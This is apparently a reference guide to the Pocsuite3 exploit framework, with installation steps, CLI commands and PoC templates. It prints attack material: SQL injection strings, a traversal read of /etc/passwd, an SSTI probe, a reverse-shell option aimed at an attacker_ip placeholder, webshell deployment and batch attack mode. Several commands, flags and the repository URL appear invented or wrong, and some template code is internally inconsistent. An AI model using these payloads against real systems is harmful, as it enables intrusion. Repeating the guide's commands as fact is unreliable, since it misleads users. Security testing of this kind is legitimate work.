Pocsuite3

Overview

Pocsuite3 is a powerful, open-source vulnerability testing framework written in Python. It provides a comprehensive platform for security researchers to develop, test, and deploy Proof-of-Concept (PoC) exploits. Pocsuite3 supports multiple protocols, payload delivery methods, and includes built-in vulnerability databases, making it ideal for authorized security assessments and research.

Installation

Linux (Debian/Ubuntu)

sudo apt-get install python3 python3-pip
pip3 install pocsuite3

Fedora/RHEL

sudo dnf install python3 python3-pip
pip3 install pocsuite3

macOS

brew install python3
pip3 install pocsuite3

Windows

pip install pocsuite3

From Source

git clone https://github.com/projectdiscovery/pocsuite3.git
cd pocsuite3
pip3 install -r requirements.txt
python3 setup.py install

Verify Installation

pocsuite3 --version
pocsuite3 --help

Core Concepts

PoC Script Structure

Pocsuite3 PoCs follow a specific framework structure with metadata, options, and verification methods.

Vulnerability Database Integration

Pocsuite3 includes built-in access to:

• Official Pocsuite3 database
• ExploitDB integration
• NVD vulnerability data
• Custom local databases

Payload Delivery Methods

• Direct execution
• WebShell payload delivery
• Reverse shell generation
• Custom payload encoding

Basic Commands

Test Single Target

pocsuite3 -u http://target.com --poc poc_name
pocsuite3 -u http://target.com:8080 --poc vulnerable_cms

Test Multiple Targets

pocsuite3 -f targets.txt --poc poc_name
pocsuite3 -f urls.txt --poc exploit_name -v 2

List Available PoCs

pocsuite3 --list
pocsuite3 --list | grep keyword

Search PoC Database

pocsuite3 --search keyword
pocsuite3 --search cve_name
pocsuite3 --search "directory traversal"

Common Usage Patterns

Command	Description
pocsuite3 -u URL --poc name	Test target with specific PoC
pocsuite3 -f targets.txt --poc name	Test multiple targets from file
pocsuite3 -u URL --poc-dir ./pocs	Use custom PoC directory
pocsuite3 -u URL --poc name -v 2	Verbose output (level 2)
pocsuite3 --search keyword	Search PoC database
pocsuite3 -u URL --poc name --attack	Execute in attack mode
pocsuite3 -u URL --poc name --verify	Run in verification mode only

PoC Development

Basic PoC Template

from pocsuite3.api import *
import urllib.request

class PocName(POCBase):
    vulID = "CVE-XXXX-XXXXX"
    version = "1"
    author = ["Your Name"]
    vulDate = "2024-01-15"
    createDate = "2024-01-16"
    updateDate = "2024-01-16"
    references = ["https://example.com"]
    name = "Vulnerable Application RCE"
    appPowerLink = ""
    appName = "Vulnerable App"
    appVersion = ""
    vulType = "Remote Code Execution"
    desc = """
    Detailed vulnerability description here.
    Steps to reproduce and impact assessment.
    """
    samples = ["http://target.com"]
    install_requires = ["requests"]
    def _check(self):
        result = {}
        try:
            resp = requests.get(self.url, timeout=10)
            if "vulnerable_string" in resp.text:
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = self.url
        except Exception as e:
            pass
        return self.parse_result(result)
    def _exploit(self):
        result = {}
        payload = "malicious_payload"
        try:
            resp = requests.post(
                self.url,
                data={"param": payload},
                timeout=10
            )
            if "success_indicator" in resp.text:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Content": resp.text
                }
        except Exception as e:
            pass
        return self.parse_result(result)

Complete PoC with Parameter Options

from pocsuite3.api import *

class VulnerableAPIPoc(POCBase):
    vulID = "CVE-2024-00000"
    version = "1.1"
    author = ["Security Researcher"]
    references = ["https://nvd.nist.gov"]
    name = "Vulnerable API Endpoint Exploitation"
    appName = "Vulnerable Service"
    vulType = "SQL Injection / RCE"
    desc = "Detailed vulnerability description"
    samples = ["http://example.com"]
    
    def _options(self):
        return {
            "command": {
                "value": "id",
                "description": "Command to execute",
                "require": False
            },
            "timeout": {
                "value": 10,
                "description": "Request timeout",
                "require": False
            }
        }
    
    def _check(self):
        result = {}
        try:
            payload = "' OR '1'='1"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200 and "data" in resp.text:
                result["VerifyInfo"] = {"URL": self.url}
        except:
            pass
        return self.parse_result(result)
    
    def _exploit(self):
        result = {}
        cmd = self.get_option("command")
        try:
            payload = f"'; exec('{cmd}'); --"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Output": resp.text
                }
        except:
            pass
        return self.parse_result(result)

Running PoCs

Verification Mode (Safe)

pocsuite3 -u http://target.com --poc cve_name --verify

Attack/Exploit Mode

pocsuite3 -u http://target.com --poc cve_name --attack

With Custom Options

pocsuite3 -u http://target.com --poc name -o "command=whoami"
pocsuite3 -u http://target.com --poc name -o "lhost=192.168.1.100,lport=4444"

Batch Testing from File

pocsuite3 -f urls.txt --poc cve_name --attack
pocsuite3 -f targets.txt --poc cve_name -v 2 --report report.json

Advanced Options

Concurrency Control

pocsuite3 -u http://target.com --poc name --threads 5
pocsuite3 -f targets.txt --poc name --threads 20

Output Formats

pocsuite3 -u URL --poc name --report report.json
pocsuite3 -u URL --poc name --report report.html
pocsuite3 -u URL --poc name --report report.txt

Proxy Configuration

pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080
pocsuite3 -u URL --poc name --proxy socks5://127.0.0.1:1080

Custom User Agent

pocsuite3 -u URL --poc name --user-agent "Custom UA"

Timeout Settings

pocsuite3 -u URL --poc name --timeout 30

PoC Database Operations

Update Local Database

pocsuite3 --update

Search by CVE

pocsuite3 --search CVE-2024-12345
pocsuite3 --search "CVE-2024"

Search by Application

pocsuite3 --search "Apache Struts"
pocsuite3 --search "WordPress"

Search by Vulnerability Type

pocsuite3 --search "RCE"
pocsuite3 --search "SQL Injection"
pocsuite3 --search "Directory Traversal"

Display PoC Details

pocsuite3 --show cve_id
pocsuite3 --show CVE-2024-00000

Working with Custom PoCs

Directory Structure

custom_pocs/
├── poc_rce_exploit.py
├── poc_sql_injection.py
├── poc_directory_traversal.py
└── utils/
    ├── helper.py
    └── payloads.txt

Load Custom PoC Directory

pocsuite3 -u http://target.com --poc-dir ./custom_pocs --poc poc_name
pocsuite3 -f targets.txt --poc-dir ./exploits --poc vulnerability

Test Custom PoC Syntax

pocsuite3 --check-poc ./custom_pocs/poc_name.py

Payload Delivery

Reverse Shell Payload

pocsuite3 -u URL --poc name -o "lhost=attacker_ip,lport=4444"

WebShell Deployment

pocsuite3 -u URL --poc webshell_poc -o "shell_path=/uploads/shell.php"

Custom Payload Encoding

def _exploit(self):
    payload = base64.b64encode(b"command").decode()
    resp = requests.post(
        f"{self.url}/api",
        data={"data": payload}
    )

Exploitation Techniques

SQL Injection PoC

def _check(self):
    result = {}
    test_payload = "' OR '1'='1"
    resp = requests.get(f"{self.url}?id={test_payload}")
    if "error" not in resp.text and len(resp.text) > expected_length:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Remote Code Execution PoC

def _exploit(self):
    result = {}
    cmd = "whoami"
    payload = f"{{{{7*7}}}}"
    resp = requests.get(f"{self.url}/api?input={payload}")
    if "49" in resp.text:
        result["ShellInfo"] = {"URL": self.url, "Command": cmd}
    return self.parse_result(result)

Directory Traversal PoC

def _check(self):
    result = {}
    traversal_payload = "../../../../etc/passwd"
    resp = requests.get(f"{self.url}/download?file={traversal_payload}")
    if "root:" in resp.text:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Reporting and Output

Generate JSON Report

pocsuite3 -f targets.txt --poc name --report results.json

Generate HTML Report

pocsuite3 -f targets.txt --poc name --report results.html

Parse Results

cat results.json | jq '.results[] | {target: .target, vulnerable: .status}'

Export Successful Targets

pocsuite3 -f targets.txt --poc name --report results.json
cat results.json | jq '.results[] | select(.status == "success") | .target' > vulnerable_targets.txt

Vulnerability Scanning Workflow

Step 1: Prepare Target List

cat targets.txt
# http://target1.com
# http://target2.com:8080
# http://target3.com/app

Step 2: Search for Relevant PoCs

pocsuite3 --search "web application vulnerability"

Step 3: Run Verification

pocsuite3 -f targets.txt --poc cve_name --verify

Step 4: Generate Report

pocsuite3 -f targets.txt --poc cve_name --report assessment.html

Step 5: Analyze Results

cat assessment.html

Integration with Other Tools

With Nuclei

# Export Pocsuite3 findings to file
pocsuite3 -f targets.txt --poc name --report findings.json

With Burp Suite

pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080

With Metasploit

# Use Pocsuite3 PoCs alongside Metasploit modules
pocsuite3 -f targets.txt --poc name --report msf_compatible.txt

Best Practices

• Authorization: Always obtain written authorization before testing
• Documentation: Document all PoCs with proper references and descriptions
• Testing: Validate PoCs in controlled environments first
• Responsible Disclosure: Follow coordinated disclosure practices
• Version Control: Track PoC changes and updates
• Error Handling: Include proper exception handling in exploit code
• Stealth: Use appropriate timeouts and request patterns
• Verification: Distinguish between verification and exploitation modes

Troubleshooting

Connection Timeout

pocsuite3 -u URL --poc name --timeout 30

SSL/TLS Certificate Issues

pocsuite3 -u URL --poc name --verify-ssl false

Module Import Errors

pip3 install -r requirements.txt
pocsuite3 --check-poc poc_name.py

Debugging PoC Execution

pocsuite3 -u URL --poc name -v 3

Related Tools

• Nuclei: Template-based vulnerability scanning
• Metasploit: Comprehensive exploitation framework
• Burp Suite: Web application security testing
• OWASP ZAP: Automated security testing
• Exploit-DB: Vulnerability and exploit database